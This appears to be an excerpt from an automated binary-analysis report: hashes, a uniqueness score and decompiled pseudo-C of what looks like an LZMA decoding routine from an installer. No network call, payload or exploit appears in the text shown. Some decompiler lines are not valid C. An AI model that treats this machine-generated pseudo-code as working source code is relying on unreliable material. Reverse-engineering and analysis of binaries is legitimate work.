                                                                                                                        • Opcode ID: abd89e45c2a658b1316b3d4f01b0b3756ccb9227471bfd75c63f163c6189ffd7
                                                                                                                        • Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
                                                                                                                        • Opcode Fuzzy Hash: abd89e45c2a658b1316b3d4f01b0b3756ccb9227471bfd75c63f163c6189ffd7
                                                                                                                        • Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 99%
                                                                                                                        			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
